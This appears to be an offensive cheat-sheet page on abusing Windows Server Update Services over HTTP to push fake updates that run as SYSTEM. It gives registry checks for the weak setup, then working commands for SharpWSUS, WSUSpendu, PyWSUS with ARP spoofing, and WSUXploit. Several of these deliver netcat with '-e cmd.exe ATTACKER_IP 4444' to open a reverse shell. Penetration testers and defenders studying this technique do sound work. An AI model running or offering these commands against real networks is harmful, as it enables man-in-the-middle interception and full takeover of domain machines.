Skip to main content

Overview

WSUS (Windows Server Update Services) pushes updates to domain machines. If WSUS uses HTTP (not HTTPS), you can MITM the update process and inject a malicious update that executes as SYSTEM.

Check WSUS Configuration

reg query "HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate" /v WUServer
reg query "HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU" /v UseWUServer
(Get-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate" -Name WUServer).WUServer

Vulnerable If

  • WUServer uses http:// (not https://)
  • UseWUServer = 1

SharpWSUS

Inject fake update on WSUS server (requires admin on WSUS server or MITM position).
https://github.com/nettitude/SharpWSUS

Create Malicious Update

SharpWSUS.exe create /payload:"C:\Windows\Temp\nc.exe" /args:"-e cmd.exe ATTACKER_IP 4444" /title:"Critical Security Update"

Approve Update for Target

SharpWSUS.exe approve /updateid:<UPDATE_GUID> /computername:TARGET.domain.local /groupname:"Critical Updates"

Check Status

SharpWSUS.exe check /updateid:<UPDATE_GUID> /computername:TARGET.domain.local

Cleanup

SharpWSUS.exe delete /updateid:<UPDATE_GUID> /computername:TARGET.domain.local

WSUSpendu (PowerShell)

https://github.com/AlsidOfficial/WSUSpendu
.\WSUSpendu.ps1 -Inject -PayloadFile nc.exe -PayloadArgs '-e cmd.exe ATTACKER_IP 4444' -ComputerName TARGET

PyWSUS — MITM Attack

If on same network and WSUS uses HTTP:
https://github.com/GoSecure/pywsus

ARP Spoofing + Inject

# ARP spoof
arpspoof -i eth0 -t TARGET WSUS_SERVER
arpspoof -i eth0 -t WSUS_SERVER TARGET

# Run PyWSUS
python3 pywsus.py --host ATTACKER_IP --port 8530 -c '/c nc.exe -e cmd.exe ATTACKER_IP 4444' --executable payload.exe

WSUXploit

Automated WSUS MITM.
https://github.com/pimps/wsuxploit
# wsuxploit is a bash script with positional args: <target> <wsus_ip> <wsus_port> <binary>
./wsuxploit.sh TARGET_IP WSUS_IP 8530 /tmp/payload.exe

Quick Reference

ScenarioTool
Admin on WSUS serverSharpWSUS
MITM position (HTTP WSUS)PyWSUS / WSUXploit
PowerShell-basedWSUSpendu